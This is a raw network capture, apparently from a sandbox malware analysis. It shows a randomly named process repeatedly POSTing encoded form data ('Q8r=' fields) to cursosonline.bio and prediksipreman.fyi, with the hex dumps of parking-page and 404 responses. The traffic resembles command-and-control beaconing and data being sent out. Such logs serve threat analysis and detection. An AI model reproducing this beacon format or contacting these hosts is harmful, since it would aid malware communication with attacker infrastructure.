Nov 4, 2024 10:11:12.258321047 CET	10846	OUT	POST /uq6t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.cursosonline.bio Origin: http://www.cursosonline.bio Content-Length: 10300 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cursosonline.bio/uq6t/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 55 6b 6d 4f 56 4a 51 4c 49 51 33 4b 67 6c 57 61 46 4c 6f 6d 45 6a 72 43 46 32 75 56 41 39 2f 52 39 33 30 43 4d 31 47 54 54 37 59 54 58 41 68 6e 76 33 43 49 56 4b 4f 71 59 6b 39 74 6c 5a 61 2b 78 57 4b 65 6d 6c 31 7a 5a 74 53 62 58 6e 42 68 48 78 48 49 72 4b 55 33 5a 38 59 62 6b 61 32 42 76 4f 71 4d 36 48 59 4f 38 58 48 70 59 79 33 6c 69 39 67 51 71 32 79 4b 2f 39 66 79 48 48 71 66 2f 77 66 4f 74 6e 36 51 47 37 31 5a 5a 7a 64 72 4e 2f 67 39 46 77 74 2f 6f 69 45 33 78 5a 38 79 39 56 67 33 2b 6b 32 37 62 51 55 35 72 69 72 34 70 31 2f 6b 38 66 54 33 5a 74 6c 44 50 37 70 34 6f 74 33 45 30 57 47 35 70 7a 4f 73 6d 4b 7a 32 37 33 42 37 48 47 55 4e 53 39 55 69 64 33 6b 64 50 52 7a 39 41 4e 59 4d 70 64 36 51 66 49 4a 68 36 6d 67 58 73 46 6f 77 2f 5a 47 2f 69 35 42 6d 73 62 34 73 34 4c 73 39 4e 34 44 31 55 4a 55 4d 38 77 34 71 74 4a 6e 5a 2b 70 52 36 6c 7a 37 4f 66 56 44 35 71 4f 56 41 56 7a 6d 66 64 6c 35 6b 6b 38 63 5a 59 2b 68 45 78 58 41 70 69 51 42 43 64 2b 35 6c 6e 76 6e 4c 2f 71 43 57 4f 78 [TRUNCATED] Data Ascii: Q8r=UkmOVJQLIQ3KglWaFLomEjrCF2uVA9/R930CM1GTT7YTXAhnv3CIVKOqYk9tlZa+xWKeml1zZtSbXnBhHxHIrKU3Z8Ybka2BvOqM6HYO8XHpYy3li9gQq2yK/9fyHHqf/wfOtn6QG71ZZzdrN/g9Fwt/oiE3xZ8y9Vg3+k27bQU5rir4p1/k8fT3ZtlDP7p4ot3E0WG5pzOsmKz273B7HGUNS9Uid3kdPRz9ANYMpd6QfIJh6mgXsFow/ZG/i5Bmsb4s4Ls9N4D1UJUM8w4qtJnZ+pR6lz7OfVD5qOVAVzmfdl5kk8cZY+hExXApiQBCd+5lnvnL/qCWOxmPYDkFrc3HgCev3f1XQ0tmVa38f48sNEwXlLFCY/HaGw4xJ/omlKQINYHVJFF1lzIZJVtz6TruZ1xoCQv96vYTrJ1aR1hN6APM3bq8YJsB/YKlgvK+OgI0ZSqAzonVJpzMIQRi6jHu0NcJnlc66Ze65R6sihAjuB7AkcIdcCSWq+w+Ao1uqTPHLr+MCATF9o5UtrXwZFX0/GtTS1HtpiQAyH+ImY1Gwg8qzRpZ2TIi8jlxeibl/xwJb7etIPPe+7IzIRXalGDDKPIqbxmiJOeLPzxbAFAjW9imTo+0d3ED0bgVKWF6e/lJdANvmP4hNAdZAB1Ef4eXEcTlgBfpLEtVY2mt+nT6oA2tiMzxCOsMBGdjbnfN9w3WHH6plUkaGBUvrAVHB0rlSZ+u/p6cN4FvqJViIhmUx2LFrybta2Ccdlhho7kaSDypr0W7CoyDU8lUsCXjdYQDfV2Ivmo4aWeWs9F3s6ljBUBs1RyNMW3t6+bGFYCTmV7bLaIdQYo6EPYQosmrI4HN7bg1M3giafXHr9bvPapHhygmNKzt/RoSOFHOmW8dQEhP/5YRVOAJJz5xlgXg/wKo5OD1I8J55W7TOVme9Dd/bO6K11gKy2cc8fTzrKZ74IwC7MCWWh+HqHE5xD09GeDnK+kvMZUbvEl7pF6JYVA4rU+f [TRUNCATED]
Nov 4, 2024 10:11:12.913022041 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 04 Nov 2024 09:11:12 GMT content-type: text/html; charset=utf-8 content-length: 1134 x-request-id: c084c358-fe65-4fd9-a058-fcb9d8ab4adc cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I51b/b72N/o5d2YVdIaYe9c9Bg3TlLRhUBESX4R3ol5oPaymVZFpJar5X1TBNLUz/+96MhfLhN8JeBO0benQ5Q== set-cookie: parking_session=c084c358-fe65-4fd9-a058-fcb9d8ab4adc; expires=Mon, 04 Nov 2024 09:26:12 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 35 31 62 2f 62 37 32 4e 2f 6f 35 64 32 59 56 64 49 61 59 65 39 63 39 42 67 33 54 6c 4c 52 68 55 42 45 53 58 34 52 33 6f 6c 35 6f 50 61 79 6d 56 5a 46 70 4a 61 72 35 58 31 54 42 4e 4c 55 7a 2f 2b 39 36 4d 68 66 4c 68 4e 38 4a 65 42 4f 30 62 65 6e 51 35 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I51b/b72N/o5d2YVdIaYe9c9Bg3TlLRhUBESX4R3ol5oPaymVZFpJar5X1TBNLUz/+96MhfLhN8JeBO0benQ5Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 4, 2024 10:11:12.913151979 CET	587	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzA4NGMzNTgtZmU2NS00ZmQ5LWEwNTgtZmNiOWQ4YWI0YWRjIiwicGFnZV90aW1lIjoxNzMwNzExND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49836	199.59.243.227	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:14.793687105 CET	468	OUT	GET /uq6t/?Q8r=ZmOuW+E1JQv4r3aGEbsQMWywCDirJqa8lSgxGnusS60cRChPvy2rfp72Zk59w6/9xgDV5k8yOfW6UGcYK3LfpsgqcNxelJTnva2v3kAA6k+BaxPzrNAzrWw=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.cursosonline.bio Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:11:15.422292948 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 04 Nov 2024 09:11:14 GMT content-type: text/html; charset=utf-8 content-length: 1458 x-request-id: 56190b3c-a038-465b-8c7b-2d35da8e0efa cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xUFXyUqSlgZi5n9tNgE5JsG7mLY5rMXeE8Zldx3VBg/DWpKVsYnJUrTa+/5LnzAXhI4ef5BIJPVWfaURJ03FkQ== set-cookie: parking_session=56190b3c-a038-465b-8c7b-2d35da8e0efa; expires=Mon, 04 Nov 2024 09:26:15 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 78 55 46 58 79 55 71 53 6c 67 5a 69 35 6e 39 74 4e 67 45 35 4a 73 47 37 6d 4c 59 35 72 4d 58 65 45 38 5a 6c 64 78 33 56 42 67 2f 44 57 70 4b 56 73 59 6e 4a 55 72 54 61 2b 2f 35 4c 6e 7a 41 58 68 49 34 65 66 35 42 49 4a 50 56 57 66 61 55 52 4a 30 33 46 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_xUFXyUqSlgZi5n9tNgE5JsG7mLY5rMXeE8Zldx3VBg/DWpKVsYnJUrTa+/5LnzAXhI4ef5BIJPVWfaURJ03FkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 4, 2024 10:11:15.422429085 CET	911	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTYxOTBiM2MtYTAzOC00NjViLThjN2ItMmQzNWRhOGUwZWZhIiwicGFnZV90aW1lIjoxNzMwNzExND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49870	162.0.215.244	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:20.552159071 CET	750	OUT	POST /fy4q/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.prediksipreman.fyi/fy4q/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 72 65 6a 6f 52 62 68 30 6e 6b 67 61 4e 76 64 53 70 50 6d 79 6a 47 31 41 4c 50 37 30 52 44 74 6c 71 75 52 56 70 78 37 2b 48 2f 7a 32 65 62 65 32 63 6e 7a 31 61 6b 39 56 41 43 71 62 64 67 51 32 32 63 31 31 6d 48 33 63 59 6e 44 46 52 75 72 42 41 45 37 42 49 70 78 65 49 4e 2f 30 6e 31 4a 75 2f 4d 46 47 68 52 59 32 58 4d 6f 34 61 4e 4c 35 37 4c 6d 69 38 59 62 77 35 38 56 79 78 67 2b 49 4d 68 36 47 61 54 4c 50 65 4f 31 42 35 66 55 47 43 2b 46 43 7a 37 43 51 4f 67 5a 76 6d 67 70 4e 6c 6d 30 7a 43 56 39 33 35 2b 2f 48 2f 64 63 6c 6a 55 73 79 36 7a 62 45 6c 6c 69 61 43 69 4c 38 67 77 3d 3d Data Ascii: Q8r=rejoRbh0nkgaNvdSpPmyjG1ALP70RDtlquRVpx7+H/z2ebe2cnz1ak9VACqbdgQ22c11mH3cYnDFRurBAE7BIpxeIN/0n1Ju/MFGhRY2XMo4aNL57Lmi8Ybw58Vyxg+IMh6GaTLPeO1B5fUGC+FCz7CQOgZvmgpNlm0zCV935+/H/dcljUsy6zbElliaCiL8gw==
Nov 4, 2024 10:11:21.224293947 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 04 Nov 2024 09:11:21 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae fe 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e9 7c fb ed f2 98 b8 95 09 46 54 f9 bd 7b ac c3 e6 e9 8e c9 d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 66 51 ba d5 53 5d 79 f7 e4 dd a7 74 4c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 52 98 7e 62 fe 23 33 b8 2e 0f 0b b7 bc 9a 82 bc a3 9e 9a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c6 f7 a5 6d c6 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 39 ab 06 d3 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 56 e6 9c 06 7f bf 0c ed 5f fb e6 01 e9 dc 7b 66 12 c6 a7 87 01 55 80 65 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 4e 2b c3 b3 fb 30 40 89 bc 7b [TRUNCATED] Data Ascii: 1359ZJrnhztDo$@B%tEw5d.4}f2:~bPAP%=\|FT{MwrIe`fQS]ytL;pE_J{tR~b#3.tngEu5xr&AUhm;b9NG(^n/^V_{fUe7n*/L-B/?N+0@{{T+1J`,PQ.>lc8/7'L,0}?_vfry8a&gv&JLdU~Y?}"xW<KK>Lfre.meeVu7/yVAfYfL/5u;_w\Xq]ps:n\UNa}K{-G'ua&H~00}3qCVVUY0xl/+,+I+^kga\[NBf:Aev]~m?Z+5"&7~#EF7--L/>eu+=SwU+g^Wvx8WhC('x#n^@Jbg>wabjO}ejv}m_.z9^GY[#Q@PY(q>gM@F[[@t.8g\|D%~
Nov 4, 2024 10:11:21.224405050 CET	1236	IN	Data Raw: 9c f1 29 81 12 f8 9b 1a de f8 f9 5b e2 3a a1 39 f8 53 02 1c e9 8b 62 c6 23 32 ef fe 7c b3 cc 2d 6a 6f ba 7b e1 e5 59 79 89 50 0f 83 c2 8d 81 af 6b 6e 0c b0 1f d3 7b 2c 60 3f ed c3 20 08 1d c7 4d df 58 ea 7b fb 76 15 9f 2e c8 7e b6 eb f7 e3 de d8 Data Ascii: )[:9Sb#2\|-jo{YyPkn{,`? MX{v.~ga~'PSy\pC{K;v-}K;c#,{PuBz2}GH}/>7y!#?6x!GiY\Wa3zu
Nov 4, 2024 10:11:21.224684000 CET	424	IN	Data Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34 Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
Nov 4, 2024 10:11:21.224695921 CET	1236	IN	Data Raw: d5 e1 7e a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b4 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 Data Ascii: ~cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]F9I?!S@kpF38'!6I;ywV4-"g)W3i$v#TsT2r,.,$][YZL'939}Zv
Nov 4, 2024 10:11:21.225094080 CET	1098	IN	Data Raw: 78 3b ac 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 Data Ascii: x;uW$FNcYXp8.Y=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;7e&JaT:5aVB0t8<7s!n)Wf-%zO`XI(B46;PIIdl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49884	162.0.215.244	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:23.093401909 CET	770	OUT	POST /fy4q/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.prediksipreman.fyi Origin: http://www.prediksipreman.fyi Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.prediksipreman.fyi/fy4q/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 72 65 6a 6f 52 62 68 30 6e 6b 67 61 4d 50 74 53 75 73 4f 79 6d 6d 31 42 45 76 37 30 59 6a 74 68 71 75 64 56 70 77 2b 6c 48 4e 48 32 65 36 75 32 64 6d 7a 31 66 6b 39 56 55 53 71 61 43 51 51 4c 32 64 49 47 6d 46 6a 63 59 6e 6e 46 52 72 58 42 41 7a 76 4f 49 35 78 63 45 74 2f 68 6a 31 4a 75 2f 4d 46 47 68 52 4d 63 58 4d 41 34 61 63 37 35 37 71 6d 68 31 34 62 78 75 4d 56 79 67 51 2b 54 4d 68 37 56 61 58 53 67 65 4d 39 42 35 65 6b 47 44 71 5a 44 6d 4c 43 53 54 77 59 2b 69 53 4e 44 6f 6c 38 39 41 44 35 51 37 36 36 71 2b 62 52 2f 79 6c 4e 6c 6f 7a 2f 33 34 69 72 75 50 68 32 31 37 33 31 73 69 67 69 43 57 37 50 79 69 45 67 6c 6b 34 4c 69 49 61 77 3d Data Ascii: Q8r=rejoRbh0nkgaMPtSusOymm1BEv70YjthqudVpw+lHNH2e6u2dmz1fk9VUSqaCQQL2dIGmFjcYnnFRrXBAzvOI5xcEt/hj1Ju/MFGhRMcXMA4ac757qmh14bxuMVygQ+TMh7VaXSgeM9B5ekGDqZDmLCSTwY+iSNDol89AD5Q766q+bR/ylNloz/34iruPh21731sigiCW7PyiEglk4LiIaw=
Nov 4, 2024 10:11:23.749346018 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 04 Nov 2024 09:11:23 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae fe 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f 62 97 cc da 50 b8 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e9 7c fb ed f2 98 b8 95 09 46 54 f9 bd 7b ac c3 e6 e9 8e c9 d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 66 51 ba d5 53 5d 79 f7 e4 dd a7 74 4c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 52 98 7e 62 fe 23 33 b8 2e 0f 0b b7 bc 9a 82 bc a3 9e 9a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c6 f7 a5 6d c6 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 39 ab 06 d3 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 56 e6 9c 06 7f bf 0c ed 5f fb e6 01 e9 dc 7b 66 12 c6 a7 87 01 55 80 65 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 4e 2b c3 b3 fb 30 40 89 bc 7b [TRUNCATED] Data Ascii: 1359ZJrnhztDo$@B%tEw5d.4}f2:~bPAP%=\|FT{MwrIe`fQS]ytL;pE_J{tR~b#3.tngEu5xr&AUhm;b9NG(^n/^V_{fUe7n*/L-B/?N+0@{{T+1J`,PQ.>lc8/7'L,0}?_vfry8a&gv&JLdU~Y?}"xW<KK>Lfre.meeVu7/yVAfYfL/5u;_w\Xq]ps:n\UNa}K{-G'ua&H~00}3qCVVUY0xl/+,+I+^kga\[NBf:Aev]~m?Z+5"&7~#EF7--L/>eu+=SwU+g^Wvx8WhC('x#n^@Jbg>wabjO}ejv}m_.z9^GY[#Q@PY(q>gM@F[[@t.8g\|D%~
Nov 4, 2024 10:11:23.749455929 CET	212	IN	Data Raw: 9c f1 29 81 12 f8 9b 1a de f8 f9 5b e2 3a a1 39 f8 53 02 1c e9 8b 62 c6 23 32 ef fe 7c b3 cc 2d 6a 6f ba 7b e1 e5 59 79 89 50 0f 83 c2 8d 81 af 6b 6e 0c b0 1f d3 7b 2c 60 3f ed c3 20 08 1d c7 4d df 58 ea 7b fb 76 15 9f 2e c8 7e b6 eb f7 e3 de d8 Data Ascii: )[:9Sb#2\|-jo{YyPkn{,`? MX{v.~ga~'PSy\pC{K;v-}K;c#,{PuBz2}GH}/>7y!#?6x!
Nov 4, 2024 10:11:23.749468088 CET	1236	IN	Data Raw: fb c7 1a ee 47 bc 19 97 69 95 59 5c 57 1f 18 d7 cb 61 fc ca 7f f4 33 fb f6 7a bc f9 a0 eb 75 4b c8 cd 39 bd 9f 76 23 9c 97 03 f7 b3 f6 3f 00 d0 4d bc fe 4c f1 6f 54 3f 70 3e 93 09 10 ed ff c2 f9 fc e8 36 ea 22 fe 93 63 56 e6 c3 c5 8d c0 79 ea ff Data Ascii: GiY\Wa3zuK9v#?MLoT?p>6"cVy2KwD\|7Rk9ghJ8OJJLR4?CYVvjCmQK!K4.fx:2ux1z2;\|gYfuL>Ca!;@IMu.>%
Nov 4, 2024 10:11:23.749836922 CET	1236	IN	Data Raw: cc 09 8d 73 68 79 29 53 13 79 b9 35 b8 b6 3e 0e 09 2a 50 dc 0e 97 4d 51 5d b4 82 28 aa b1 1a 29 56 5b 6a d3 dc 49 1c 0b 0e 58 72 bd 62 99 76 4d d7 e4 16 47 ca 95 18 ae c6 00 31 ed 7e cc f8 94 cb 1e 62 53 9a 44 15 c5 22 90 d4 b5 20 39 4d ee ca b5 Data Ascii: shy)Sy5>*PMQ]()V[jIXrbvMG1~bSD" 9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGf
Nov 4, 2024 10:11:23.749850988 CET	1236	IN	Data Raw: 34 05 3c 08 7a 5d 8e cb 64 13 90 a2 b0 e1 c5 76 56 2d 4e e3 5a 1e 29 2e dc 52 69 41 77 cb 94 32 4f e2 6a b1 8d 54 b2 cd e8 f9 49 83 20 47 5f 97 35 37 87 16 64 8e d1 2c e1 f1 4e e9 1d 83 8e 57 d7 ea 3e ae 05 7d b1 2b b4 12 1c ae 68 0e 59 fa 67 31 Data Ascii: 4<z]dvV-NZ).RiAw2OjTI G_57d,NW>}+hYg1.LlvtLwI*(<k<$b{JlxM=0 .cH)v Hv\d)Nkt56!]i,NKJ!"jMVx;uW$FNcYXp8.Y
Nov 4, 2024 10:11:23.749861956 CET	74	IN	Data Raw: d4 3f 43 e6 7b 99 bd 14 15 ef be 31 df eb 8b ff fd 5f a0 02 84 8e 06 d7 d4 3e 50 d9 b3 da cc 1b 85 bc c7 d7 23 7c ad b5 47 f8 39 7e 3d 5e ae c9 7d fb ed 7f 00 00 00 ff ff 03 00 76 8b 63 38 84 27 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ?C{1_>P#\|G9~=^}vc8'0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49900	162.0.215.244	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
